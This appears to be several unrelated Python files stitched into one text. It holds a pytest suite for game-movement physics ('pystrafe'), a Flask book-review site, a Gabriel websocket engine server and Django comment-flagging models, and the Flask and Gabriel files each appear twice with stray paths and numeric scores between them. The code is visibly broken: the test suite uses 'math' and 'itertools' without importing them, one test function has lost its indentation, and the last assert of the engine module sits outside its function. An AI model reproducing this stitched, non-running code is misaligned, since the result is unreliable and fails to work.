import numpy as np
from pytest import raises, approx
from pystrafe import motion
def test_strafe_K():
    """Spot-check strafe_K against known values, including zero arguments.

    All four parameters zero must raise ZeroDivisionError; a zero fourth
    argument or zero third argument yields K == 0.
    """
    with raises(ZeroDivisionError):
        motion.strafe_K(0, 0, 0, 0)
    assert motion.strafe_K(30, 0.001, 320, 0) == 0.0
    assert motion.strafe_K(30, 0.01, 320, 10) == approx(90000)
    assert motion.strafe_K(30, 0.001, 320, 10) == approx(181760)
    assert motion.strafe_K(320, 0.001, 320, 10) == approx(2037760)
    assert motion.strafe_K(320, 0.001, 320, 2000) == approx(102400000)
    assert motion.strafe_K(30, 0.001, 10, 10) == approx(1990)
    assert motion.strafe_K(30, 0.001, 0, 10) == 0
def test_strafe_K_neg_params():
    """strafe_K must reject any negative parameter with ValueError."""
    with raises(ValueError):
        motion.strafe_K(-10, 10, 10, 10)
    with raises(ValueError):
        motion.strafe_K(10, -10, 10, 10)
    with raises(ValueError):
        motion.strafe_K(10, 10, -10, 10)
    with raises(ValueError):
        motion.strafe_K(10, -10, 10, -10)
def test_strafe_speedxf():
    """Check final strafing speed for several (t, v0, K) combinations.

    Negative K raises ValueError; K == 0 or t == 0 leaves the initial
    speed unchanged.
    """
    with raises(ValueError):
        motion.strafe_speedxf(4, 450, -10)
    assert motion.strafe_speedxf(4, 450, 0) == 450
    assert motion.strafe_speedxf(0, 0, 0) == 0
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_speedxf(4, 450, K) == approx(964.12654771)
    assert motion.strafe_speedxf(0, 987, K) == 987
    K = motion.strafe_K(30, 0.001, 320, 100)
    assert motion.strafe_speedxf(4.2, 0, K) == approx(1944.222209522)
    K = motion.strafe_K(320, 0.01, 320, 10)
    assert motion.strafe_speedxf(2, 100, K) == approx(1975.145564256)
def test_strafe_speedxf_neg_time():
    """Negative time with zero speed raises; with a suitable positive speed
    it runs the motion backwards to the earlier speed of 400."""
    K = motion.strafe_K(320, 0.01, 320, 10)
    with raises(ValueError):
        motion.strafe_speedxf(-1, 0, K)
    assert motion.strafe_speedxf(-1, 1451.068571777, K) == approx(400)
def test_strafe_distance():
    """Check strafing distance for several (t, v0, K) inputs.

    Negative K raises ValueError; zero time gives zero distance; the sign
    of the initial speed does not make the distance negative.
    """
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_distance(1, 100, -K)
    assert motion.strafe_distance(0, 456, K) == 0
    assert motion.strafe_distance(0, 1e5, 1e8) == 0
    assert motion.strafe_distance(1, 100, K) == approx(304.32984903732694)
    K = motion.strafe_K(30, 0.01, 320, 10)
    assert motion.strafe_distance(2.5, 1, K) == approx(790.5746781033104)
    assert motion.strafe_distance(1, -100, K) == approx(226.83538223469472)
    assert motion.strafe_distance(1, 953.93920141694559, K) == approx(977.15056822651479)
def test_strafe_distance_neg_time():
    """Negative time raises for v0=100 but yields a positive distance for
    v0=1000, matching the forward case in test_strafe_distance."""
    K = motion.strafe_K(30, 0.01, 320, 10)
    with raises(ValueError):
        motion.strafe_distance(-1, 100, K)
    assert motion.strafe_distance(-1, 1000, K) == approx(977.15056822651479)
def test_strafe_distance_zero_K():
    """As K approaches zero the distance degenerates to |v0| * t."""
    assert motion.strafe_distance(1, 100, 1) == approx(100.00249995834504)
    assert motion.strafe_distance(1, 100, 1e-5) == approx(100.00000086923438)
    assert motion.strafe_distance(1, 100, 0) == 100
    assert motion.strafe_distance(1, -100, 0) == 100
def test_strafe_time():
    """Check time-to-cover-distance for several (x, v0, K) inputs.

    Negative K raises ValueError; zero distance takes zero time; an
    unreachable distance with no speed and no K takes infinite time.
    The result is symmetric in the signs of x and v0.
    """
    assert motion.strafe_time(400, 400, 1e-5) == approx(0.9999901521950959)
    assert motion.strafe_time(400, 400, 0) == approx(1)
    assert motion.strafe_time(0, 400, 0) == approx(0)
    assert motion.strafe_time(1, 0, 0) == math.inf
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_time(100, 320, -K)
    assert motion.strafe_time(100000, 320, K) == approx(49.314635892504114)
    assert motion.strafe_time(100, 320, K) == approx(0.28012970263654435)
    assert motion.strafe_time(0, 320, K) == approx(0)
    assert motion.strafe_time(-100, 320, K) == approx(0.28012970263654435)
    assert motion.strafe_time(-100, -320, K) == approx(0.28012970263654435)
    K = motion.strafe_K(30, 0.001, 320, 100)
    assert motion.strafe_time(1000, 320, K) == approx(1.2653051142112355)
    assert motion.strafe_time(0, 320, K) == approx(0)
def test_strafe_time_extremes():
    """strafe_time must never go negative over a wide grid of tiny
    distances and huge speeds (numerical-stability sweep)."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    xs = [0, 1e-15, 1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2]
    vs = [0, 1, 1e1, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1e9, 1e10, 1e15]
    for x, v in itertools.product(xs, vs):
        assert motion.strafe_time(x, v, K) >= 0
def test_gravity_speediz_distance_time_zero_t():
    """With zero time, a nonzero displacement needs +/-inf initial vertical
    speed (sign follows the displacement); zero displacement raises."""
    assert motion.gravity_speediz_distance_time(0, 1, 800) == math.inf
    assert motion.gravity_speediz_distance_time(0, -1, 800) == -math.inf
    with raises(ValueError):
        motion.gravity_speediz_distance_time(0, 0, 800)
    with raises(ValueError):
        motion.gravity_speediz_distance_time(0, 0, 0)
    assert motion.gravity_speediz_distance_time(0, 1, 0) == math.inf
    assert motion.gravity_speediz_distance_time(0, -1, 0) == -math.inf
def test_gravity_time_speediz_z():
    """Check the (t_early, t_late) root pair returned for given initial
    vertical speed, displacement, and gravity.

    Zero gravity with nonzero speed gives equal roots; zero speed with an
    unreachable positive displacement raises ValueError; flipping the signs
    of gravity and displacement mirrors the roots.
    """
    assert motion.gravity_time_speediz_z(10, 10, 0) == (1, 1)
    with raises(ZeroDivisionError):
        motion.gravity_time_speediz_z(0, 10, 0)
    assert motion.gravity_time_speediz_z(0, 0, 800) == (0, 0)
    with raises(ValueError):
        motion.gravity_time_speediz_z(0, 10, 800)
    ret = motion.gravity_time_speediz_z(0, 10, -800)
    assert ret[0] == approx(0.15811388300841897)
    assert ret[1] == approx(-0.15811388300841897)
    ret = motion.gravity_time_speediz_z(0, -10, 800)
    assert ret[0] == approx(-0.15811388300841897)
    assert ret[1] == approx(0.15811388300841897)
    ret = motion.gravity_time_speediz_z(-100, 6.25, 800)
    assert ret[0] == approx(-0.125)
    assert ret[0] == approx(ret[1])
    ret = motion.gravity_time_speediz_z(268, 20, 800)
    assert ret[0] == approx(0.085550606334671569)
    assert ret[1] == approx(0.58444939366532844)
    ret = motion.gravity_time_speediz_z(268, -20, 560)
    assert ret[0] == approx(-0.069570144084276309)
    assert ret[1] == approx(1.0267130012271333)
def test_gravity_time_speediz_z_curve_shape():
vs = range(-1000, 1001, 50)
zs = range(-10000, 10000, 100)
for v, z in itertools.product(vs, zs):
try:
t = motion.gravity_time_speediz_z(v, z, 800)
except (ZeroDivisionError, ValueError):
continue
if math.isclose(t[0], t[1]):
continue
assert v - 800 * t[0] > 0
assert v - 800 * t[1] < 0
def test_strafe_solve_speedxi():
    """A negative strafing constant K is rejected."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_solve_speedxi(10, -K, 400, -200, 800)
def test_strafe_solve_speedxi_neg_z():
    """Falling targets (z < 0): required initial horizontal speed."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_solve_speedxi(0, K, 100, -18, 800) == approx(450.6474498822009)
    assert motion.strafe_solve_speedxi(0, K, 100, -100, 800) == approx(0)
    assert motion.strafe_solve_speedxi(163.23541222592047, K, 100, -18, 800) == approx(0)
    assert motion.strafe_solve_speedxi(200, K, 100, -18, 800) == approx(0)
    assert motion.strafe_solve_speedxi(0, K, 100, -1e-3, 800) == approx(63245.55095141193)
    assert motion.strafe_solve_speedxi(-10000, K, 100, -100, 800) == approx(10003.952996977921)
    assert motion.strafe_solve_speedxi(-100, K, 200, -200, 800) == approx(248.98914739139963)
def test_strafe_solve_speedxi_pos_z():
    """Rising targets (z > 0): unreachable heights raise ValueError."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_solve_speedxi(1000, K, 100, 400, 800) == approx(0)
    with raises(ValueError):
        motion.strafe_solve_speedxi(1000, K, 100, 700, 800)
    with raises(ValueError):
        motion.strafe_solve_speedxi(0, K, 100, 700, 800)
def test_strafe_solve_speedxi_zero_z():
    """z == 0: any nonzero horizontal distance needs infinite initial speed."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_solve_speedxi(1000, K, 1, 0, 800) == math.inf
    assert motion.strafe_solve_speedxi(0, K, 0, 0, 800) == approx(0)
    assert motion.strafe_solve_speedxi(0, K, 100, 0, 800) == math.inf
    assert motion.strafe_solve_speedxi(0, K, 1e-5, 0, 800) == math.inf
def test_strafe_solve_speedxi_zero_x():
    """x == 0 edge cases: some parameter combinations are invalid."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_solve_speedxi(0, K, 0, 1, 800)
    with raises(ValueError):
        motion.strafe_solve_speedxi(40, K, 0, 2, 800)
    assert motion.strafe_solve_speedxi(40, K, 0, 1, 800) == approx(0)
def test_strafe_solve_speedxi_impossible():
    """Impossible geometries yield NaN (negative viz) or ValueError."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert math.isnan(motion.strafe_solve_speedxi(-100, K, 0, 2, 800))
    assert math.isnan(motion.strafe_solve_speedxi(-100, K, 10, 2, 800))
    with raises(ValueError):
        motion.strafe_solve_speedxi(0, K, 10, 2, 800)
def test_strafe_solve_speedxi_curve_shape():
    """Horizontal arrival time never exceeds the first vertical crossing."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    xs = range(1, 10000, 500)
    zs = range(1, 601, 100)
    for x, z in itertools.product(xs, zs):
        vix = motion.strafe_solve_speedxi(1000, K, x, z, 800)
        tx = motion.strafe_time(x, vix, K)
        tz = motion.gravity_time_speediz_z(1000, z, 800)
        if not math.isclose(tx, tz[0], abs_tol=1e-6):
            assert tx <= tz[0]
def test_solve_boost_min_dmg():
    """Basic solve: boost components match and arrival is on the falling edge."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.solve_boost_min_dmg([0, 0], -K, 400, 400, 800)
    dv = motion.solve_boost_min_dmg([0, 0], K, 400, 400, 800)
    assert dv[0] == approx(79.399032802535118, 1e-4)
    assert dv[1] == approx(816.5301806366407, 1e-4)
    t = motion.gravity_time_speediz_z(dv[1], 400, 800)
    # Horizontal and vertical arrival times must coincide.
    assert t[1] == approx(motion.strafe_time(400, dv[0], K))
    # Vertical speed at arrival is non-positive (descending).
    assert dv[1] - 800 * t[1] <= 0
def test_solve_boost_min_dmg_neg_z():
    """Falling targets, for two different strafing constants."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
    assert dv[0] == approx(298.46589871993854, 1e-4)
    assert dv[1] == approx(366.81197893286605, 1e-4)
    K = motion.strafe_K(30, 0.001, 320, 100)
    dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
    assert dv[0] == approx(77.238561539572189, 1e-4)
    assert dv[1] == approx(241.47957829048562, 1e-4)
    dv = motion.solve_boost_min_dmg([0, 0], K, 0, -200, 800)
    assert dv[0] == approx(0)
    assert dv[1] == approx(0)
def test_solve_boost_min_dmg_neg_viz():
    """Initial downward speed must be compensated by the vertical boost."""
    K = motion.strafe_K(30, 0.001, 320, 100)
    dv = motion.solve_boost_min_dmg([0, -600], K, 300, -200, 800)
    assert dv[0] == approx(51.986602324707007)
    assert dv[1] == approx(511.7601499627252)
    tx = motion.strafe_time(300, dv[0], K)
    tz = motion.gravity_time_speediz_z(-600 + dv[1], -200, 800)
    assert tx == approx(tz[1])
    K = motion.strafe_K(30, 0.001, 320, 10)
    dv = motion.solve_boost_min_dmg([0, -600], K, 1000, 500, 800)
    assert dv[0] == approx(520.92144757654194)
    assert dv[1] == approx(1545.1246586237653)
    tx = motion.strafe_time(1000, dv[0], K)
    tz = motion.gravity_time_speediz_z(-600 + dv[1], 500, 800)
    assert tx == approx(tz[1])
def test_solve_boost_min_dmg_range():
    """Sweep of displacements: solutions are bounded, non-negative and stable."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    for d in itertools.chain(range(-10000, 10001, 100), np.arange(-100, 100, 0.5)):
        dv = motion.solve_boost_min_dmg([0, 0], K, d, d, 800)
        assert dv[0] < 1e4 and dv[1] < 1e4
        assert dv[0] >= 0 and dv[1] >= 0
        t = motion.gravity_time_speediz_z(dv[1], d, 800)
        assert dv[1] - 800 * t[1] <= 0
        strafe_t = motion.strafe_time(d, dv[0], K)
        # Arrival happens between the two vertical crossings.
        if not math.isclose(t[1], strafe_t):
            assert t[1] > strafe_t
        if not math.isclose(t[0], strafe_t):
            assert t[0] < strafe_t
        # Re-solving from the solution itself needs no further boost.
        dv = motion.solve_boost_min_dmg(dv, K, d, d, 800)
        assert dv[0] == approx(0, abs=1e-5)
        assert dv[1] == approx(0, abs=1e-5)
        dv = motion.solve_boost_min_dmg([0, 0], K, 400, d, 800)
        assert dv[0] < 1e4 and dv[1] < 1e4
def test_solve_boost_min_dmg_inc_v():
    """Boost magnitude is non-increasing as the initial speed grows, per axis."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    for axis in (0, 1):
        prev_mag = math.inf
        for speed in range(0, 10000, 100):
            vel = [0, 0]
            vel[axis] = speed
            dv = motion.solve_boost_min_dmg(vel, K, 1500, -200, 800)
            cur_mag = math.hypot(dv[0], dv[1])
            assert cur_mag <= prev_mag
            prev_mag = cur_mag
def test_solve_boost_min_dmg_zero_pos():
    """Degenerate geometry: zero horizontal distance and zero/tiny height."""
    # Bug fix: numpy removed the `np.warnings` alias in NumPy 1.24, so the
    # original np.warnings.filterwarnings(...) raises AttributeError on modern
    # numpy.  Use the stdlib warnings module, and catch_warnings() so the
    # previous filter state is restored instead of being reset to 'default'.
    import warnings
    K = motion.strafe_K(30, 0.001, 320, 10)
    with warnings.catch_warnings():
        warnings.simplefilter('ignore')
        dv = motion.solve_boost_min_dmg([400, 0], K, 0, -1, 800)
        assert dv[0] == approx(0, abs=1e-5)
        assert dv[1] == approx(0, abs=1e-5)
        dv = motion.solve_boost_min_dmg([0, 0], K, 0, 1, 800)
        assert dv[1] >= 1e4
        dv = motion.solve_boost_min_dmg([200, 200], K, 0, 0, 800)
        assert dv[0] == approx(0, abs=1e-5)
        assert dv[1] == approx(0, abs=1e-5)
def test_solve_boost_min_dmg_neg_x():
    """The solution is symmetric in the sign of the horizontal displacement."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    dv1 = motion.solve_boost_min_dmg([0, 0], K, -400, 500, 800)
    dv2 = motion.solve_boost_min_dmg([0, 0], K, 400, 500, 800)
    assert dv1 == dv2
def test_solve_boost_min_dmg_no_dv():
    """Cases already reachable without any boost return (0, 0)."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    dv = motion.solve_boost_min_dmg([0, 0], K, 100, -100000, 800)
    assert dv[0] == approx(0, abs=1e-5)
    dv = motion.solve_boost_min_dmg([10000, 0], K, 1000, -10, 800)
    assert dv[0] == approx(0, abs=1e-5)
    assert dv[1] == approx(0, abs=1e-5)
    dv = motion.solve_boost_min_dmg([0, 1500], K, 500, 1000, 800)
    assert dv[0] == approx(0, abs=1e-5)
    assert dv[1] == approx(0, abs=1e-5)
from flask import Flask, render_template, request, jsonify
from goodreads_search import search_book, get_book_isbn
from review_parser import scrape_reviews
from youtube_search import get_video_ids
from pprint import pprint
from time import time
# Flask application object for the book-info site.
app = Flask(__name__)
@app.route("/")
def index():
    """Serve the search landing page."""
    return render_template("index.html")
@app.route("/book_info", methods=["POST"])
def show_book_info_page():
    """Look up the posted book title and render its detail page."""
    start_time = time()
    book_title = request.form["book_title"]
    book_dict = search_book(book_title, "title", 1)[0]
    best_book = book_dict["best_book"]
    # Enlarge the (initially low-quality) cover image by rewriting its url
    # suffix; Goodreads size-tagged urls end with "_<size>_.jpg".
    image_url = best_book["image_url"]
    if image_url[-5] == "_":
        image_url = image_url[:-7] + "318_.jpg"
    book_cover_url = f"background-image:url('{image_url}');"
    youtube_video_id = get_video_ids(best_book["title"] + " book review", 1)[0]
    print(f"Finished. Took {time() - start_time} seconds")
    return render_template(
        "book.html",
        book_dict=book_dict,
        book_cover_url=book_cover_url,
        youtube_video_id=youtube_video_id,
        book_id=str(best_book["id"]),
    )
@app.route("/get_reviews")
def get_reviews():
    """Scrape reviews for the requested book and return them as JSON.

    Expects a ``book_id`` query parameter; responds with
    ``{"result": {index: {"text": ..., "author": ...}}}``.
    """
    book_id = request.args.get("book_id")
    # Bug fix: the original called pprint("book_id"), printing the literal
    # string instead of the requested id.
    pprint(book_id)
    book_isbn = get_book_isbn(book_id)
    pprint(book_isbn)
    scrape_start = time()
    reviews = scrape_reviews(book_isbn).get_mood_range()
    print(f"Scraped. Took {time() - scrape_start} seconds")
    review_dict = {}
    # `idx` instead of `id`: avoid shadowing the builtin.
    for idx, review in enumerate(reviews):
        review_dict[idx] = {"text": review.text, "author": review.author}
        print(review_dict[idx])
    return jsonify(result=review_dict)
# enter the code below to launch the web server
# FLASK_APP=app.py FLASK_ENV=development flask run | app.py | from flask import Flask, render_template, request, jsonify
from goodreads_search import search_book, get_book_isbn
from review_parser import scrape_reviews
from youtube_search import get_video_ids
from pprint import pprint
from time import time
# Flask application object for the book-info site.
app = Flask(__name__)
@app.route("/")
def index():
    """Serve the search landing page."""
    return render_template("index.html")
@app.route("/book_info", methods=["POST"])
def show_book_info_page():
    """Look up the posted book title and render its detail page."""
    start_time = time()
    book_title = request.form["book_title"]
    book_dict = search_book(book_title, "title", 1)[0]
    best_book = book_dict["best_book"]
    # Enlarge the (initially low-quality) cover image by rewriting its url
    # suffix; Goodreads size-tagged urls end with "_<size>_.jpg".
    image_url = best_book["image_url"]
    if image_url[-5] == "_":
        image_url = image_url[:-7] + "318_.jpg"
    book_cover_url = f"background-image:url('{image_url}');"
    youtube_video_id = get_video_ids(best_book["title"] + " book review", 1)[0]
    print(f"Finished. Took {time() - start_time} seconds")
    return render_template(
        "book.html",
        book_dict=book_dict,
        book_cover_url=book_cover_url,
        youtube_video_id=youtube_video_id,
        book_id=str(best_book["id"]),
    )
@app.route("/get_reviews")
def get_reviews():
    """Scrape reviews for the requested book and return them as JSON.

    Expects a ``book_id`` query parameter; responds with
    ``{"result": {index: {"text": ..., "author": ...}}}``.
    """
    book_id = request.args.get("book_id")
    # Bug fix: the original called pprint("book_id"), printing the literal
    # string instead of the requested id.
    pprint(book_id)
    book_isbn = get_book_isbn(book_id)
    pprint(book_isbn)
    scrape_start = time()
    reviews = scrape_reviews(book_isbn).get_mood_range()
    print(f"Scraped. Took {time() - scrape_start} seconds")
    review_dict = {}
    # `idx` instead of `id`: avoid shadowing the builtin.
    for idx, review in enumerate(reviews):
        review_dict[idx] = {"text": review.text, "author": review.author}
        print(review_dict[idx])
    return jsonify(result=review_dict)
# enter the code below to launch the web server
# FLASK_APP=app.py FLASK_ENV=development flask run | 0.274157 | 0.124107 |
import asyncio
import logging
import multiprocessing
import os
import queue
from gabriel_protocol import gabriel_pb2
from gabriel_server import cognitive_engine
from gabriel_server.websocket_server import WebsocketServer
# Wire format on the engine pipe: each protobuf message is preceded by its
# size encoded in this many big-endian bytes.
_NUM_BYTES_FOR_SIZE = 4
_BYTEORDER = 'big'
logger = logging.getLogger(__name__)
def run(engine_factory, filter_name, input_queue_maxsize, port, num_tokens):
    """Start the websocket server and one cognitive-engine child process.

    Frames flow: server -> multiprocessing queue -> engine process; results
    flow back over an OS pipe. This call blocks in local_server.launch() and
    always ends by raising 'Server stopped'.
    """
    try:
        input_queue = multiprocessing.Queue(input_queue_maxsize)
        read, write = os.pipe()
        local_server = _LocalServer(port, num_tokens, input_queue, read)
        local_server.add_filter_consumed(filter_name)
        engine_process = multiprocessing.Process(
            target=_run_engine, args=(engine_factory, input_queue, read, write))
        engine_process.start()
        # Parent keeps only the read end; the child inherited its own copies.
        os.close(write)
        local_server.launch()
    finally:
        # NOTE(review): if anything above raised before `local_server` (or
        # `read`) was bound, this cleanup itself fails with NameError.
        local_server.cleanup()
        # NOTE(review): `read` was wrapped by os.fdopen() inside _LocalServer,
        # so cleanup() may already have closed this fd — possible double close.
        os.close(read)
        # NOTE(review): raising inside `finally` replaces any in-flight
        # exception, hiding the original failure cause.
        raise Exception('Server stopped')
class _LocalServer(WebsocketServer):
    """WebsocketServer that exchanges protobuf messages with one engine process.

    Frames go to the engine through a multiprocessing queue; results come back
    over an OS pipe wired into the asyncio event loop as a StreamReader.
    """
    def __init__(self, port, num_tokens_per_filter, input_queue, read):
        super().__init__(port, num_tokens_per_filter)
        self._input_queue = input_queue
        loop = asyncio.get_event_loop()
        self._stream_reader = asyncio.StreamReader(loop=loop)
        def protocol_factory():
            return asyncio.StreamReaderProtocol(self._stream_reader)
        # Wrap the pipe's read end so the event loop can await engine output.
        # NOTE(review): mode='r' opens the fd in text mode although the pipe
        # carries binary protobuf data — confirm connect_read_pipe only uses
        # the underlying fd and bypasses text decoding.
        pipe = os.fdopen(read, mode='r')
        self._transport, _ = loop.run_until_complete(
            loop.connect_read_pipe(protocol_factory, pipe))
    def cleanup(self):
        # Closing the transport also closes the wrapped pipe object/fd.
        self._transport.close()
    async def _send_to_engine(self, to_engine):
        """Enqueue a frame for the engine; False means it was dropped (full)."""
        try:
            # I did not check self._input_queue full() because the docs say that
            # multiprocessing.Queue().full() is not reliable.
            self._input_queue.put_nowait(to_engine.SerializeToString())
        except queue.Full:
            return False
        return True
    async def _recv_from_engine(self):
        '''Read serialized protobuf message.
        The size of the bytestring is read. Then the bytestring itself is
        read.'''
        size_bytes = await self._stream_reader.readexactly(_NUM_BYTES_FOR_SIZE)
        size_of_message = int.from_bytes(size_bytes, _BYTEORDER)
        from_engine_serialized = await self._stream_reader.readexactly(
            size_of_message)
        from_engine = gabriel_pb2.FromEngine()
        from_engine.ParseFromString(from_engine_serialized)
        return from_engine
def _run_engine(engine_factory, input_queue, read, write):
    """Child-process loop: pull frames off the queue, run the engine, and
    write each serialized result back over the pipe. Runs until killed."""
    try:
        # The child only writes; close its inherited copy of the read end.
        os.close(read)
        engine = engine_factory()
        logger.info('Cognitive engine started')
        while True:
            to_engine = gabriel_pb2.ToEngine()
            to_engine.ParseFromString(input_queue.get())
            result_wrapper = engine.handle(to_engine.from_client)
            from_engine = cognitive_engine.pack_from_engine(
                to_engine.host, to_engine.port, result_wrapper)
            _write_message(write, from_engine.SerializeToString())
    finally:
        os.close(write)
def _write_message(fd, serialized_message):
    '''Write serialized protobuf message to file descriptor fd.
    The size of the bytestring is written. Then the bytestring itself is
    written.'''
    size_of_message = len(serialized_message)
    size_bytes = size_of_message.to_bytes(_NUM_BYTES_FOR_SIZE, _BYTEORDER)
    num_bytes_written = os.write(fd, size_bytes)
    # NOTE(review): os.write may legally perform a partial write on a pipe;
    # asserting instead of looping can silently drop data, and asserts are
    # stripped entirely under `python -O`.
    assert num_bytes_written == _NUM_BYTES_FOR_SIZE, 'Write incomplete'
    num_bytes_written = os.write(fd, serialized_message)
assert num_bytes_written == size_of_message, 'Write incomplete' | src/gabriel_server/local_engine.py | import asyncio
import logging
import multiprocessing
import os
import queue
from gabriel_protocol import gabriel_pb2
from gabriel_server import cognitive_engine
from gabriel_server.websocket_server import WebsocketServer
# Wire format on the engine pipe: each protobuf message is preceded by its
# size encoded in this many big-endian bytes.
_NUM_BYTES_FOR_SIZE = 4
_BYTEORDER = 'big'
logger = logging.getLogger(__name__)
def run(engine_factory, filter_name, input_queue_maxsize, port, num_tokens):
    """Start the websocket server and one cognitive-engine child process.

    Frames flow: server -> multiprocessing queue -> engine process; results
    flow back over an OS pipe. This call blocks in local_server.launch() and
    always ends by raising 'Server stopped'.
    """
    try:
        input_queue = multiprocessing.Queue(input_queue_maxsize)
        read, write = os.pipe()
        local_server = _LocalServer(port, num_tokens, input_queue, read)
        local_server.add_filter_consumed(filter_name)
        engine_process = multiprocessing.Process(
            target=_run_engine, args=(engine_factory, input_queue, read, write))
        engine_process.start()
        # Parent keeps only the read end; the child inherited its own copies.
        os.close(write)
        local_server.launch()
    finally:
        # NOTE(review): if anything above raised before `local_server` (or
        # `read`) was bound, this cleanup itself fails with NameError.
        local_server.cleanup()
        # NOTE(review): `read` was wrapped by os.fdopen() inside _LocalServer,
        # so cleanup() may already have closed this fd — possible double close.
        os.close(read)
        # NOTE(review): raising inside `finally` replaces any in-flight
        # exception, hiding the original failure cause.
        raise Exception('Server stopped')
class _LocalServer(WebsocketServer):
    """WebsocketServer that exchanges protobuf messages with one engine process.

    Frames go to the engine through a multiprocessing queue; results come back
    over an OS pipe wired into the asyncio event loop as a StreamReader.
    """
    def __init__(self, port, num_tokens_per_filter, input_queue, read):
        super().__init__(port, num_tokens_per_filter)
        self._input_queue = input_queue
        loop = asyncio.get_event_loop()
        self._stream_reader = asyncio.StreamReader(loop=loop)
        def protocol_factory():
            return asyncio.StreamReaderProtocol(self._stream_reader)
        # Wrap the pipe's read end so the event loop can await engine output.
        # NOTE(review): mode='r' opens the fd in text mode although the pipe
        # carries binary protobuf data — confirm connect_read_pipe only uses
        # the underlying fd and bypasses text decoding.
        pipe = os.fdopen(read, mode='r')
        self._transport, _ = loop.run_until_complete(
            loop.connect_read_pipe(protocol_factory, pipe))
    def cleanup(self):
        # Closing the transport also closes the wrapped pipe object/fd.
        self._transport.close()
    async def _send_to_engine(self, to_engine):
        """Enqueue a frame for the engine; False means it was dropped (full)."""
        try:
            # I did not check self._input_queue full() because the docs say that
            # multiprocessing.Queue().full() is not reliable.
            self._input_queue.put_nowait(to_engine.SerializeToString())
        except queue.Full:
            return False
        return True
    async def _recv_from_engine(self):
        '''Read serialized protobuf message.
        The size of the bytestring is read. Then the bytestring itself is
        read.'''
        size_bytes = await self._stream_reader.readexactly(_NUM_BYTES_FOR_SIZE)
        size_of_message = int.from_bytes(size_bytes, _BYTEORDER)
        from_engine_serialized = await self._stream_reader.readexactly(
            size_of_message)
        from_engine = gabriel_pb2.FromEngine()
        from_engine.ParseFromString(from_engine_serialized)
        return from_engine
def _run_engine(engine_factory, input_queue, read, write):
    """Child-process loop: pull frames off the queue, run the engine, and
    write each serialized result back over the pipe. Runs until killed."""
    try:
        # The child only writes; close its inherited copy of the read end.
        os.close(read)
        engine = engine_factory()
        logger.info('Cognitive engine started')
        while True:
            to_engine = gabriel_pb2.ToEngine()
            to_engine.ParseFromString(input_queue.get())
            result_wrapper = engine.handle(to_engine.from_client)
            from_engine = cognitive_engine.pack_from_engine(
                to_engine.host, to_engine.port, result_wrapper)
            _write_message(write, from_engine.SerializeToString())
    finally:
        os.close(write)
def _write_message(fd, serialized_message):
    '''Write serialized protobuf message to file descriptor fd.
    The size of the bytestring is written. Then the bytestring itself is
    written.'''
    size_of_message = len(serialized_message)
    size_bytes = size_of_message.to_bytes(_NUM_BYTES_FOR_SIZE, _BYTEORDER)
    num_bytes_written = os.write(fd, size_bytes)
    # NOTE(review): os.write may legally perform a partial write on a pipe;
    # asserting instead of looping can silently drop data, and asserts are
    # stripped entirely under `python -O`.
    assert num_bytes_written == _NUM_BYTES_FOR_SIZE, 'Write incomplete'
    num_bytes_written = os.write(fd, serialized_message)
assert num_bytes_written == size_of_message, 'Write incomplete' | 0.390941 | 0.080647 |
from django.db import models
from .models import UserProfile, Comment
class Flagged(models.Model):
    """A flag raised by a user against a comment, user or question."""
    flagged_by = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
    # offensive, violent/threat, against the rules, bullying
    reason_description = models.CharField(max_length=255)
    flag_count = models.IntegerField(default=0)
    # String model references: these classes are declared further down in this
    # module, so the original bare names raised NameError at import time.
    # on_delete is required on every ForeignKey since Django 2.0, and
    # CharField requires max_length.
    flagged_to_comment = models.ForeignKey('FlaggedComment', on_delete=models.CASCADE)
    flagged_to_user = models.ForeignKey('FlaggedUser', on_delete=models.CASCADE)
    flagged_to_question = models.ForeignKey('FlaggedQuestion', on_delete=models.CASCADE)

    def add_flag(self):
        """Increment this flag's counter and persist it.

        The original was a @classmethod doing `cls.flag_count += 1`, which
        tries to add 1 to the IntegerField *descriptor* and raises TypeError;
        the counter lives on instances, so these are instance methods.
        """
        # FORMULA : Total Comments
        self.flag_count += 1
        self.save(update_fields=['flag_count'])

    def remove_flag(self):
        """Decrement this flag's counter and persist it."""
        self.flag_count -= 1
        self.save(update_fields=['flag_count'])


class FlaggedComment(models.Model):
    """Marks a single comment as flagged."""
    comment_id = models.OneToOneField(Comment, on_delete=models.CASCADE)
    flagged = models.OneToOneField(Flagged, on_delete=models.CASCADE)


class FlaggedUser(models.Model):
    """A user who has accumulated flags and may be banned."""
    is_banned_user = models.BooleanField(default=False)
    flagged_question = models.ManyToManyField('FlaggedQuestion')
    flagged_question_count = models.IntegerField(default=0)

    @classmethod
    def get_flag_count(cls):
        """Placeholder for flag-count aggregation (not implemented yet)."""
        pass


class FlaggedQuestion(models.Model):
    """A question that has been flagged (e.g. for age restriction)."""
    is_age_restricted = models.BooleanField(default=False)
class BlockedUser(FlaggedUser):
    """
    Ubiq. Language:
    Blocker = User that is blocking
    Blocked = User blocked
    Description:
    The Blocker won't see the Blocked details, and
    vice versa. This includes not seeing their
    comments, or on News Feed.
    Blocked users are viewed by Blocker on a list
    They can choose to unblock.
    """
